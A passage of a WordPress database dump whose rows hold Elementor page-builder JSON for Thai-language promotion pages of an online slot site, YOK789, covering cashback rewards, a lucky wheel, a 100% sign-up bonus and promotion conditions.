0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d72c4a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Reward-10_-Banner-Yok789.webp\",\"id\":277,\"size\":\"\",\"alt\":\"Reward 10\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"879b024\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/lucky-wheel-Banner-Yok789.webp\",\"id\":276,\"size\":\"\",\"alt\":\"lucky wheel \",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 <b>YOK789<\\/b><\\/strong>\\u00a0\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\"><strong data-start=\\\"2414\\\" data-end=\\\"2445\\\"><b>YOK789<\\/b> \\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2586,342,'_thumbnail_id','282'),(2590,343,'_elementor_edit_mode','builder'),(2591,343,'_elementor_template_type','wp-page'),(2592,343,'_elementor_version','3.35.5'),(2593,343,'_elementor_pro_version','3.32.3'),(2594,343,'_wp_page_template','default'),(2595,343,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2596,343,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 YOK789 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e08\\u0e32\\u0e01 YOK789 \\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e42\\u0e14\\u0e22\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30 \\u0e01\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e23\\u0e48\\u0e27\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e14\\u0e49 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e41\\u0e23\\u0e01 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e15\\u0e32\\u0e21\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01\\u0e22\\u0e34\\u0e48\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21 \\u0e04\\u0e27\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 